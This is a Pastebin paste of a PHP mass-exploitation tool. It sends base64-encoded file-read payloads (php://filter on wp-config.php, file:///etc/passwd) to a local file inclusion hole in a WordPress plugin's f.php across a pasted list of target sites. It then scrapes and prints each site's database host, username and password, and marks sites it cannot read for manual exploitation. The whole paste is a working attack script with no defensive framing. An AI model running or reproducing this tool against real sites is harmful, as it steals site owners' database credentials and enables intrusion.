Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method="post" action="" >
- Targets :
- <br />
- <textarea style="width: 300px; height: 300px;" name="targets"></textarea>
- <br />
- <!--
- <select name="methods">
- <option value="Config">Config</option>
- <option value="etcpasswd">/etc/passwd</option>
- <!--<option value="Cpanel">Cpanel Login</option>
- </select>
- !-->
- <input type="submit" name="sub" value="go" />
- </form>
- <?php
- error_reporting(0);
- function fetch_value($str, $find_start, $find_end)
- {
- $start = strpos($str, $find_start);
- if ($start === false) {
- return "";
- }
- $length = strlen($find_start);
- $end = strpos(substr($str, $start + $length), $find_end);
- return trim(substr($str, $start + $length, $end));
- }
- /////////////////////
- if(isset($_POST['sub']))
- {
- $targets = $_POST['targets'];
- $explode = explode("\r\n",$targets);
- /*
- switch($_POST['methods'])
- {
- case 'Config' :
- $host = strip_tags(fetch_value($contents, "define('DB_HOST', '", "');"));
- $user = strip_tags(fetch_value($contents, "define('DB_USER', '", "');"));
- $pass = strip_tags(fetch_value($contents, "define('DB_PASSWORD', '", "');"));
- $echo = "
- <p>Site : <font color='blue'> $crleet </font><p>
- <br>
- <p>Host : <font color='blue'> $host </font><p>
- <br>
- <p>Username : <font color='blue'> $user </font><p>
- <br>
- <p>Password : <font color='blue'> $pass </font><p>
- <br>
- ";
- $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
- break;
- case 'etcpasswd' :
- $echo = "
- <p>Site : <font color='blue'> $crleet </font><p>
- <p>etc/pass : <font color='blue'> $contents </font><p>
- ";
- $exploit = "/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk";
- break;
- /* case 'Cpanel' :
- $echo "<p>Site : <font color='blue'> $crleet </font><p>
- <p>User : <font color='blue'> $crleet </font><p>
- <p>User : <font color='blue'> $crleet </font><p>
- ";
- $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
- break; ////////////////////////
- default:
- echo "select your method";
- } */
- foreach( $explode as $crleet)
- {
- $exploit = "/wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==";
- $larmy = ($crleet).($exploit);
- $contents = file_get_contents($larmy);
- $host = strip_tags(fetch_value($contents, "define('DB_HOST', '", "');"));
- $user = strip_tags(fetch_value($contents, "define('DB_USER', '", "');"));
- $pass = strip_tags(fetch_value($contents, "define('DB_PASSWORD', '", "');"));
- if(ereg("DB_HOST",$contents))
- {
- echo "<hr>
- <p>Site : <font color='blue'> $crleet </font><p>
- <br>
- <p>Host : <font color='blue'> $host </font><p>
- <br>
- <p>Username : <font color='blue'> $user </font><p>
- <br>
- <p>Password : <font color='blue'> $pass </font><p>
- <br><hr>";
- } else {
- echo
- "
- <hr>
- <p>Site : <font color='blue'> $crleet </font><p>
- <br>
- <p>Host : <font color='blue'> Not Infected </font><p>
- <br>
- <p><a href='$larmy' >manual exploitation </a><p>
- <hr>
- ";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement